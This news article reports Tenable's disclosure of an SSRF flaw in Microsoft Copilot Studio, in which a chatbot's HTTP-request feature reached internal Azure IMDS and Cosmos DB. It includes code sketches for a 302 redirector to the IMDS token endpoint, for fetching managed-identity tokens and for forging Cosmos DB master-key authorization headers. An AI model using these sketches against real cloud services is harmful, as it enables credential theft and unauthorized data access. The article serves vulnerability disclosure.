Copilot Studio Vulnerability Exploited to Access Sensitive Information


Microsoft has patched a critical vulnerability in its Copilot Studio tool that allowed researchers to access sensitive internal cloud data and services. The flaw, tracked as CVE-2024-38206, was discovered by cybersecurity firm Tenable and is described as a server-side request forgery (SSRF) issue.

Copilot Studio, built on Microsoft’s Power Platform, lets users create custom AI chatbots that perform various tasks using data from Microsoft 365 and other connected sources. One Copilot Studio feature allows a chatbot to make outbound HTTP requests when triggered by specific user phrases.

Tenable researchers found that by combining this HTTP request functionality with an SSRF protection bypass, they could access Microsoft’s internal infrastructure for Copilot Studio, including the Instance Metadata Service (IMDS) and internal Cosmos DB databases.
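One common way SSRF protections are defeated is with an attacker-controlled redirector: the HTTP action targets an innocuous-looking external URL that passes validation, and that server answers with a redirect to the internal endpoint. The following is a hypothetical Python sketch of that general pattern, not the researchers’ actual exploit; the port and target URL are illustrative assumptions.

    # Hypothetical SSRF-bypass redirector (illustrative only, not Tenable's exploit).
    # The chatbot's HTTP action is pointed at this attacker-controlled server, which
    # looks harmless when the URL is validated but answers with a 302 redirect to
    # the link-local Azure IMDS endpoint. If the client follows redirects after its
    # SSRF check, the request lands on internal infrastructure.
    from http.server import BaseHTTPRequestHandler, HTTPServer

    IMDS_TARGET = (
        "http://169.254.169.254/metadata/identity/oauth2/token"
        "?api-version=2018-02-01&resource=https://management.azure.com/"
    )

    class Redirector(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(302)
            self.send_header("Location", IMDS_TARGET)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("0.0.0.0", 8080), Redirector).serve_forever()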

Using their exploit, the researchers retrieved instance metadata, including managed identity access tokens, through Copilot chat messages. These access tokens could then be used to access other internal Microsoft cloud resources.
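For context, the sketch below shows roughly what a managed identity token request to Azure IMDS looks like when made directly from inside the hosting environment. The link-local endpoint, api-version, and mandatory Metadata: true header are documented Azure behavior; the target resource is an arbitrary example, and direct network access is assumed here in place of the SSRF path the researchers used.

    # Minimal sketch: requesting a managed identity access token from Azure IMDS.
    # 169.254.169.254 is link-local and reachable only from inside the host,
    # which is why an SSRF primitive in that environment is so valuable.
    import json
    import urllib.request

    IMDS_TOKEN_URL = (
        "http://169.254.169.254/metadata/identity/oauth2/token"
        "?api-version=2018-02-01"
        "&resource=https://management.azure.com/"  # example target resource
    )

    req = urllib.request.Request(IMDS_TOKEN_URL, headers={"Metadata": "true"})
    with urllib.request.urlopen(req, timeout=5) as resp:
        token = json.load(resp)

    # The bearer token can now be presented to other Azure services that
    # trust this managed identity.
    print(token["access_token"][:40] + "...")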

For example, the researchers gained read/write access to an internal Cosmos DB instance by generating valid authorization tokens using the Cosmos DB master keys obtained through the IMDS.

While this particular database was only accessible to Microsoft’s internal infrastructure, the researchers’ Copilot instance was able to access it by crafting requests with the appropriate headers.
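Those headers follow Cosmos DB’s documented master-key scheme: the client builds a canonical string from the HTTP verb, resource type, resource link, and request date, signs it with HMAC-SHA256 using the base64-decoded master key, and sends the result in the Authorization header alongside x-ms-date. A minimal sketch, with placeholder key and database names:

    # Minimal sketch of Cosmos DB's documented master-key authorization scheme.
    # The master key and resource names below are placeholders, not real values.
    import base64, hashlib, hmac, urllib.parse
    from email.utils import formatdate

    def cosmos_auth_token(verb, resource_type, resource_link, date_rfc1123, master_key_b64):
        # Canonical string: lowercase verb, resource type, and date; the resource
        # link is case-sensitive and used as-is. Two trailing newlines are required.
        key = base64.b64decode(master_key_b64)
        payload = (f"{verb.lower()}\n{resource_type.lower()}\n"
                   f"{resource_link}\n{date_rfc1123.lower()}\n\n")
        sig = base64.b64encode(
            hmac.new(key, payload.encode("utf-8"), hashlib.sha256).digest()
        ).decode()
        return urllib.parse.quote(f"type=master&ver=1.0&sig={sig}", safe="")

    demo_key = base64.b64encode(b"not-a-real-master-key").decode()  # placeholder
    date = formatdate(usegmt=True)  # RFC 1123 date, also sent as x-ms-date
    token = cosmos_auth_token("GET", "dbs", "dbs/exampledb", date, demo_key)
    # Send `token` in the Authorization header, with x-ms-date and x-ms-version.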

Cross-Tenant Impact and Swift Mitigation

Although Tenable did not find any immediately accessible cross-tenant data, they noted that the Copilot Studio infrastructure was shared among different customers. This means that any impact on the underlying systems could potentially affect multiple Copilot Studio tenants.

After being notified, Microsoft quickly addressed the issue, assigning it CVE-2024-38206 and classifying it as a critical information disclosure flaw. The company says the vulnerability has been fully mitigated and that no customer action is required.

The discovery of this SSRF vulnerability in Copilot Studio highlights the potential risks associated with AI-powered cloud services that can make external HTTP requests.

As these tools become more sophisticated and integrated with sensitive enterprise data, robust security measures and regular auditing will be crucial to prevent unauthorized access and data leakage.

While Microsoft has addressed this particular flaw, the growing complexity of generative AI systems demands ongoing vigilance from both service providers and their customers.
